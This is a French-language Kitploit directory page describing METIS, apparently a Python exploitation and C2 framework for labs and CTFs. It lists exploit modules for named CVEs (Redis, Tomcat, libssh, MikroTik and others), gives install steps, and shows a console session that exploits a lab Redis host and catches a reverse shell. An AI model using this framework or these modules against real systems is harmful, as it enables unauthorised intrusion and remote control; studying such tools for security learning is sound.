Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
METIS — Framework d'exploitation Python modulaire avec une console de style Metasploit, des modules Exploit et Auxiliary à enregistrement automatique, des vérifications à trois états et plusieurs transports de session pour les cibles de laboratoire et de CTF. | Kitploit
Outils/GitHubGitHub/k3ystr0k3r/metis
Frameworks de Tests d'IntrusionScanners de VulnérabilitésFrameworks d'ExploitationExploitationPost-ExploitationCTFTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
36il y a 18h 22mPas encore vérifié
GitHubk3ystr0k3r/metis

METIS

Framework d'exploitation Python modulaire avec une console de style Metasploit, des modules Exploit et Auxiliary à enregistrement automatique, des vérifications à trois états et plusieurs transports de session pour les cibles de laboratoire et de CTF.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

METIS - Framework modulaire d'exploitation et de renseignement sur les menaces

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

Un framework d'exploitation Python conçu pour l'apprentissage. Architecture modulaire, console thématisée, multiples transports de session, et une bibliothèque croissante de modules CVE.


Piloté par la communauté

METIS est un framework de recherche en sécurité piloté par la communauté. L'objectif est de construire une collection croissante de modules contribués par des chercheurs en sécurité, des développeurs et la communauté au sens large.

Vous avez un scanner utile, un module auxiliaire, un module d'exploitation, ou d'autres outils de recherche en sécurité que vous souhaitez partager ? Ajoutez-le à METIS et ouvrez une Pull Request.

Toutes les contributions sont les bienvenues, à condition qu'elles respectent la structure des modules du projet, les normes de codage et les directives d'utilisation autorisée.

Que vous ajoutiez un nouveau module CVE, amélioriez un module existant, corrigiez un bug, ou développiez de nouvelles fonctionnalités du framework, vos contributions peuvent aider à améliorer METIS pour tout le monde.

Voir Écrire des modules ci-dessous pour plus d'informations sur la création de votre propre module.


Ce que c'est

METIS est un framework C2/exploitation modulaire écrit en Python. Il exécute une console interactive de style Metasploit où vous sélectionnez des modules, définissez des options, lancez des vérifications, et obtenez des sessions contre des cibles de laboratoire.

Il est conçu pour :

  • Apprendre comment les frameworks d'exploitation fonctionnent en interne
  • Le travail en laboratoire contre des VM et conteneurs vulnérables
  • La pratique des CTF où un framework scriptable est plus rapide que des outils manuels
  • Les contributions communautaires via des modules personnalisés et des améliorations du framework

Il n'est pas conçu pour :

  • Attaquer des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas de permission écrite de tester
  • Des engagements red-team en production (utilisez Cobalt Strike, Sliver, ou Mythic)
  • Quoi que ce soit sur l'internet public

Fonctionnalités

  • Architecture modulaire — déposez un fichier .py dans modules/ et il s'enregistre automatiquement
  • Deux types de modules — Exploit (génère des sessions) et Auxiliary (scanners, énumérateurs)
  • check() à trois états — chaque module peut vérifier avant d'attaquer (VULNERABLE / SAFE / UNKNOWN)
  • Multiples transports de session — sockets inverses, sockets en écoute, canaux paramiko, webshells HTTP, telnet brut
  • Scan multi-threadé — spécifications de cibles CIDR/liste séparée par virgules/plage/file: avec barres de progression en direct
  • Console thématisée — 22 schémas de couleurs intégrés avec dégradés de barres de progression par thème
  • Automatisation par fichiers RC — scriptez des workflows entiers
  • Fichiers SOURCE par module — chargez des options depuis des fichiers KEY=VALUE
  • Échappement vers le shell local — exécutez n'importe quelle commande shell sans quitter le framework
  • Cœur léger — dépendances et abstractions délibérément minimales

Modules

Auxiliaires — scanners et énumérateurs

ModuleDescription
auxiliary/scanner/tcp_connectScanner de ports TCP multi-threadé
auxiliary/scanner/hikvision_cve_2017_7921Contournement d'authentification + énumération d'utilisateurs de caméra IP Hikvision
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847Fuite d'identifiants MikroTik WinBox
auxiliary/scanner/redis_cve_2022_0543Détecteur d'évasion de sandbox Lua Redis

Exploits — générateurs de sessions

ModuleType de session
exploit/unix/ftp/vsftpd_234_backdoorSocket en écoute
exploit/multi/http/ghost_cms_handlebars_rceSocket inverse
exploit/multi/http/langflow_rce_cve_2026_9198Socket inverse
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816Socket inverse
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197Socket inverse
exploit/multi/http/tomcat_put_rce_cve_2017_12615Socket inverse
exploit/multi/http/joomla_jce_rce_cve_2026_48907Webshell HTTP
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819Reverse différé (cron)
exploit/linux/redis/redis_cve_2022_0543_rceSocket inverse
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Canal Paramiko
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061Socket telnet brut

Installation

Nécessite Python 3.10+ et git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt :

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

Lancer :

python3 metis.py

Utilisation

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)
Télécharger l’outil